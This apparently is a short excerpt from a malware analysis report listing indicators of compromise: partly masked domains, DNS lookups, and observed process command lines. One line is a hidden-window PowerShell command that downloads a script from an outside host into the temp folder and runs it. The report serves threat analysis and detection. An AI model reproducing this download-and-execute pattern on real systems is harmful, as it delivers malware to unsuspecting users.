Technical Information
- http://dd#.com as $d
- http://dd#.com/
- http://of###ite.com/
- http://www.of###ite.com/
- DNS ASK dd#.com
- DNS ASK of###ite.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -noe $d=$env:temp+'\100.ps1';(New-Object System.Net.WebClient).DownloadFile('http://dd#.####,$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');...' (with hidden window)
- '%WINDIR%\syswow64\notepad.exe' "%TEMP%\100.ps1"